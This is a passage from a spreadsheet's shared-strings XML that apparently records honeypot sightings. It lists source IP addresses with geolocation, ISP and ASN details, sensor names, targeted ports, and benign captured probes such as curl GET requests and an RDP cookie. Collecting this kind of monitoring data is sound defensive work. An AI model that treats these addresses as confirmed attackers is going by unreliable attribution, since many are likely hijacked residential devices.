  </si>
  <si>
    <t>SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H6</t>
  </si>
  <si>
    <t>::ffff:7de4:d767</t>
  </si>
  <si>
    <t>bf92ba02c365ef3e10005a8a7aab4a89</t>
  </si>
  <si>
    <t>61.222.88.227</t>
  </si>
  <si>
    <t>61-222-88-227.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;443&amp;&amp;51200&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>::ffff:3dde:58e3</t>
  </si>
  <si>
    <t>dd11977b9f6d6b8dd84fe8bf5c48b32e</t>
  </si>
  <si>
    <t>118.170.39.165</t>
  </si>
  <si>
    <t>NA&amp;&amp;118-170-39-165.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>2007-10-04</t>
  </si>
  <si>
    <t>::ffff:76aa:27a5</t>
  </si>
  <si>
    <t>1f8b6d7fea98e085e32b923c379c83b2</t>
  </si>
  <si>
    <t>178.174.163.136</t>
  </si>
  <si>
    <t>h-178-174-163-136.A192.priv.bahnhof.se</t>
  </si>
  <si>
    <t>G</t>
  </si>
  <si>
    <t>Kronoberg</t>
  </si>
  <si>
    <t>Växjö Municipality</t>
  </si>
  <si>
    <t>Vaxjo</t>
  </si>
  <si>
    <t>2663536</t>
  </si>
  <si>
    <t>352 74</t>
  </si>
  <si>
    <t>56.879</t>
  </si>
  <si>
    <t>14.8059</t>
  </si>
  <si>
    <t>8473</t>
  </si>
  <si>
    <t>Bahnhof AB</t>
  </si>
  <si>
    <t>General Private</t>
  </si>
  <si>
    <t>2010-04-28</t>
  </si>
  <si>
    <t>2006-02-08 00:00:00</t>
  </si>
  <si>
    <t>2026-02-08 00:00:00</t>
  </si>
  <si>
    <t>2025-02-03 00:00:00</t>
  </si>
  <si>
    <t>['ns2.bahnhof.se 212.85.64.4', 'ns.bahnhof.se 195.178.160.1']</t>
  </si>
  <si>
    <t>Ascio</t>
  </si>
  <si>
    <t>::ffff:b2ae:a388</t>
  </si>
  <si>
    <t>dcaf6ddcd2a32df4bfe38b39e66c6908</t>
  </si>
  <si>
    <t>122.117.92.92</t>
  </si>
  <si>
    <t>122-117-92-92.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_DNS_H46&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>23&amp;&amp;53&amp;&amp;58691&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7a75:5c5c</t>
  </si>
  <si>
    <t>7ca6066f65e9cf26ecf9eaa644bc35a4</t>
  </si>
  <si>
    <t>120.57.84.171</t>
  </si>
  <si>
    <t>::ffff:7839:54ab</t>
  </si>
  <si>
    <t>3eab4b5d502827b2157edae0fb906e6f</t>
  </si>
  <si>
    <t>220.135.63.139</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-135-63-139.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H23</t>
  </si>
  <si>
    <t>23&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dc87:3f8b</t>
  </si>
  <si>
    <t>1fbbcbdc3fd80f9ccb1d5b6c2b365a80</t>
  </si>
  <si>
    <t>220.133.142.194</t>
  </si>
  <si>
    <t>220-133-142-194.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;20000&amp;&amp;23&amp;&amp;NA&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc85:8ec2</t>
  </si>
  <si>
    <t>c0d76bbb95d907df593dc578535cdb11</t>
  </si>
  <si>
    <t>120.56.227.121</t>
  </si>
  <si>
    <t>::ffff:7838:e379</t>
  </si>
  <si>
    <t>b1124a6763b31e259896c91a3ba0783b</t>
  </si>
  <si>
    <t>168.70.58.241</t>
  </si>
  <si>
    <t>1994-02-01</t>
  </si>
  <si>
    <t>HKTNET</t>
  </si>
  <si>
    <t>::ffff:a846:3af1</t>
  </si>
  <si>
    <t>47662eacc7125716d4ff39d82b71c9bd</t>
  </si>
  <si>
    <t>91.217.60.200</t>
  </si>
  <si>
    <t>Mykolayiv Oblast</t>
  </si>
  <si>
    <t>Pervomaysk Raion</t>
  </si>
  <si>
    <t>Pervomaysk</t>
  </si>
  <si>
    <t>697593</t>
  </si>
  <si>
    <t>48.0451</t>
  </si>
  <si>
    <t>30.8884</t>
  </si>
  <si>
    <t>197255</t>
  </si>
  <si>
    <t>VSESVIT-AS</t>
  </si>
  <si>
    <t>ZAT Televizijni kabelni merezhi Vsesvit</t>
  </si>
  <si>
    <t>Cjsc TKM Vsesvit</t>
  </si>
  <si>
    <t>::ffff:5bd9:3cc8</t>
  </si>
  <si>
    <t>f5aa65585f64bb74e1a450c9347c4d8d</t>
  </si>
  <si>
    <t>85.67.19.212</t>
  </si>
  <si>
    <t>85-67-19-212.pool.digikabel.hu</t>
  </si>
  <si>
    <t>BU</t>
  </si>
  <si>
    <t>Budapest</t>
  </si>
  <si>
    <t>3054643</t>
  </si>
  <si>
    <t>1007</t>
  </si>
  <si>
    <t>47.4979</t>
  </si>
  <si>
    <t>19.0402</t>
  </si>
  <si>
    <t>20845</t>
  </si>
  <si>
    <t>DIGI Tavkozlesi es Szolgaltato Kft.</t>
  </si>
  <si>
    <t>DIGI Tavkozlesi es Szolgaltato Kft</t>
  </si>
  <si>
    <t>INVITEL / DIGI</t>
  </si>
  <si>
    <t>2004-10-01</t>
  </si>
  <si>
    <t>::ffff:5543:13d4</t>
  </si>
  <si>
    <t>7a7dedfb0ce6615c394e3c7eaae95e9f</t>
  </si>
  <si>
    <t>103.206.225.94</t>
  </si>
  <si>
    <t>Patna (Salimpur Ahra)</t>
  </si>
  <si>
    <t>800028</t>
  </si>
  <si>
    <t>25.61</t>
  </si>
  <si>
    <t>85.1427</t>
  </si>
  <si>
    <t>134874</t>
  </si>
  <si>
    <t>Acme Diginet Corporation Pvt. Ltd</t>
  </si>
  <si>
    <t>Acme Diginet Corporation Pvt. Ltd.</t>
  </si>
  <si>
    <t>2016-01-19</t>
  </si>
  <si>
    <t>ACMEDIGINET</t>
  </si>
  <si>
    <t>::ffff:67ce:e15e</t>
  </si>
  <si>
    <t>5c005ee4db0df9fe5900d3a50eed8470</t>
  </si>
  <si>
    <t>203.112.154.122</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H34</t>
  </si>
  <si>
    <t>Coimbatore (Lakshmi Mills Colony)</t>
  </si>
  <si>
    <t>11.017</t>
  </si>
  <si>
    <t>76.9789</t>
  </si>
  <si>
    <t>59179</t>
  </si>
  <si>
    <t>MINS Technologies Private Limited</t>
  </si>
  <si>
    <t>1999-07-20</t>
  </si>
  <si>
    <t>MINS</t>
  </si>
  <si>
    <t>::ffff:cb70:9a7a</t>
  </si>
  <si>
    <t>bc9c76387f99e62f7686bcf89e4a1f82</t>
  </si>
  <si>
    <t>103.175.168.32</t>
  </si>
  <si>
    <t>::ffff:67af:a820</t>
  </si>
  <si>
    <t>d7a975724ba76991ef08b9b9b6fad65b</t>
  </si>
  <si>
    <t>221.166.211.89</t>
  </si>
  <si>
    <t>::ffff:dda6:d359</t>
  </si>
  <si>
    <t>897f20af731efa416ed77ebe1769ad5a</t>
  </si>
  <si>
    <t>175.203.56.157</t>
  </si>
  <si>
    <t>::ffff:afcb:389d</t>
  </si>
  <si>
    <t>a75022334efd5ee4f2e1d6ace2fc1088</t>
  </si>
  <si>
    <t>114.35.174.250</t>
  </si>
  <si>
    <t>114-35-174-250.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23</t>
  </si>
  <si>
    <t>23&amp;&amp;8639&amp;&amp;59173&amp;&amp;59180&amp;&amp;59163&amp;&amp;59213&amp;&amp;6538&amp;&amp;38474&amp;&amp;38492&amp;&amp;38510&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7223:aefa</t>
  </si>
  <si>
    <t>d231b726cfe88439eba612fa6d93af9d</t>
  </si>
  <si>
    <t>116.103.215.117</t>
  </si>
  <si>
    <t>::ffff:7467:d775</t>
  </si>
  <si>
    <t>2a2d3fe43067b2d3b0fcceecf20ca930</t>
  </si>
  <si>
    <t>121.168.221.154</t>
  </si>
  <si>
    <t>Yongin-si (Cheoin-gu)</t>
  </si>
  <si>
    <t>37.2033</t>
  </si>
  <si>
    <t>127.253</t>
  </si>
  <si>
    <t>Sudogwongangnambonbujang</t>
  </si>
  <si>
    <t>::ffff:79a8:dd9a</t>
  </si>
  <si>
    <t>71a95d7f43a0064ea096dc41eab1be33</t>
  </si>
  <si>
    <t>116.108.99.179</t>
  </si>
  <si>
    <t>VIETTEL-AS-VN</t>
  </si>
  <si>
    <t>::ffff:746c:63b3</t>
  </si>
  <si>
    <t>9c6745430cee8ba598a2fc4ad71278f1</t>
  </si>
  <si>
    <t>182.56.229.4</t>
  </si>
  <si>
    <t>::ffff:b638:e504</t>
  </si>
  <si>
    <t>ec744d990ab249d4c857f9d75c6a7e0e</t>
  </si>
  <si>
    <t>117.195.208.97</t>
  </si>
  <si>
    <t>::ffff:75c3:d061</t>
  </si>
  <si>
    <t>4209d15b4c140751e9ef4ee00018d182</t>
  </si>
  <si>
    <t>75.44.21.179</t>
  </si>
  <si>
    <t>Dorchester</t>
  </si>
  <si>
    <t>Summerville</t>
  </si>
  <si>
    <t>4597919</t>
  </si>
  <si>
    <t>29483</t>
  </si>
  <si>
    <t>33.0185</t>
  </si>
  <si>
    <t>-80.1757</t>
  </si>
  <si>
    <t>AT&amp;T Corp</t>
  </si>
  <si>
    <t>2006-02-28</t>
  </si>
  <si>
    <t>SBCIS-SBIS-6BLK</t>
  </si>
  <si>
    <t>2024-12-05</t>
  </si>
  <si>
    <t>::ffff:4b2c:15b3</t>
  </si>
  <si>
    <t>610317c1d580e6653d5436f7890eebd4</t>
  </si>
  <si>
    <t>185.16.38.166</t>
  </si>
  <si>
    <t>SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_RDP_H13&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_RDP_H18&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_RDP_H36&amp;&amp;SMA-LAB_RDP_H16</t>
  </si>
  <si>
    <t>3389&amp;&amp;54534&amp;&amp;22&amp;&amp;62828&amp;&amp;21&amp;&amp;52957</t>
  </si>
  <si>
    <t>Warsaw (Mokotów)</t>
  </si>
  <si>
    <t>52.1957</t>
  </si>
  <si>
    <t>20.9921</t>
  </si>
  <si>
    <t>201814</t>
  </si>
  <si>
    <t>MEVSPACE sp. z o.o.</t>
  </si>
  <si>
    <t>MEVSPACE sp. z o.o</t>
  </si>
  <si>
    <t>2013-01-18</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_RDP:NA}</t>
  </si>
  <si>
    <t>::ffff:b910:26a6</t>
  </si>
  <si>
    <t>6245398a37a8ec49c7144179ff84df82</t>
  </si>
  <si>
    <t>117.212.43.172</t>
  </si>
  <si>
    <t>Ambāla</t>
  </si>
  <si>
    <t>1278860</t>
  </si>
  <si>
    <t>133001</t>
  </si>
  <si>
    <t>30.3752</t>
  </si>
  <si>
    <t>76.7821</t>
  </si>
  <si>
    <t>::ffff:75d4:2bac</t>
  </si>
  <si>
    <t>17175cbcb7889ccf83e0d85093726c96</t>
  </si>
  <si>
    <t>79.116.36.42</t>
  </si>
  <si>
    <t>Zaragoza</t>
  </si>
  <si>
    <t>3104324</t>
  </si>
  <si>
    <t>50090</t>
  </si>
  <si>
    <t>41.6561</t>
  </si>
  <si>
    <t>-0.8773400000000001</t>
  </si>
  <si>
    <t>57269</t>
  </si>
  <si>
    <t>DIGI SPAIN TELECOM S.L.U.</t>
  </si>
  <si>
    <t>Digi Spain Telecom S.L.U.</t>
  </si>
  <si>
    <t>Digi Spain Telecom S.L</t>
  </si>
  <si>
    <t>2007-05-29</t>
  </si>
  <si>
    <t>::ffff:4f74:242a</t>
  </si>
  <si>
    <t>b243250c058d37817a7076e2de638046</t>
  </si>
  <si>
    <t>41.59.146.74</t>
  </si>
  <si>
    <t>::ffff:293b:924a</t>
  </si>
  <si>
    <t>90976512c45d0269d11f1252bbae75a0</t>
  </si>
  <si>
    <t>117.2.200.61</t>
  </si>
  <si>
    <t>SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_SOCKS5_H6</t>
  </si>
  <si>
    <t>::ffff:7502:c83d</t>
  </si>
  <si>
    <t>9c35d294e559fd43d88f23f094918ee2</t>
  </si>
  <si>
    <t>37.229.245.160</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:25e5:f5a0</t>
  </si>
  <si>
    <t>8604f9f36fc0bcbe4a064e510af63fa9</t>
  </si>
  <si>
    <t>220.135.110.129</t>
  </si>
  <si>
    <t>220-135-110-129.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_NTP_H32&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_SOCKS5_H25&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;445&amp;&amp;9100&amp;&amp;5900&amp;&amp;80&amp;&amp;123&amp;&amp;22&amp;&amp;1080&amp;&amp;12230&amp;&amp;23&amp;&amp;NA&amp;&amp;47271</t>
  </si>
  <si>
    <t>::ffff:dc87:6e81</t>
  </si>
  <si>
    <t>5c173beba5f93fba94c89520748065b1</t>
  </si>
  <si>
    <t>114.34.101.210</t>
  </si>
  <si>
    <t>114-34-101-210.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7222:65d2</t>
  </si>
  <si>
    <t>fd9fea020a5b9f7596cbdad6f1a0b347</t>
  </si>
  <si>
    <t>49.213.128.14</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;12148&amp;&amp;23&amp;&amp;32671&amp;&amp;52612&amp;&amp;38390&amp;&amp;17788&amp;&amp;44014&amp;&amp;56224&amp;&amp;35753&amp;&amp;35571&amp;&amp;35775&amp;&amp;35792&amp;&amp;35822&amp;&amp;35809&amp;&amp;35839&amp;&amp;35849&amp;&amp;9100&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:31d5:800e</t>
  </si>
  <si>
    <t>5ccd7f675b8774228890df98bd787b8c</t>
  </si>
  <si>
    <t>218.164.203.126</t>
  </si>
  <si>
    <t>2001-10-09</t>
  </si>
  <si>
    <t>::ffff:daa4:cb7e</t>
  </si>
  <si>
    <t>e2778a6ef0499635e7a775ff8b4a7887</t>
  </si>
  <si>
    <t>60.246.137.175</t>
  </si>
  <si>
    <t>nz137l175.bb60246.ctm.net</t>
  </si>
  <si>
    <t>2010-12-31</t>
  </si>
  <si>
    <t>CTM-AS-AP</t>
  </si>
  <si>
    <t>1994-12-13 05:00:00</t>
  </si>
  <si>
    <t>2025-12-12 05:00:00</t>
  </si>
  <si>
    <t>2024-11-29 07:05:02</t>
  </si>
  <si>
    <t>['NS3.MACAU.CTM.NET', 'VASSUN1.MACAU.CTM.NET', 'VASSUN2.MACAU.CTM.NET']</t>
  </si>
  <si>
    <t>::ffff:3cf6:89af</t>
  </si>
  <si>
    <t>ade7afc30e42c66d8c3b09baa775a10b</t>
  </si>
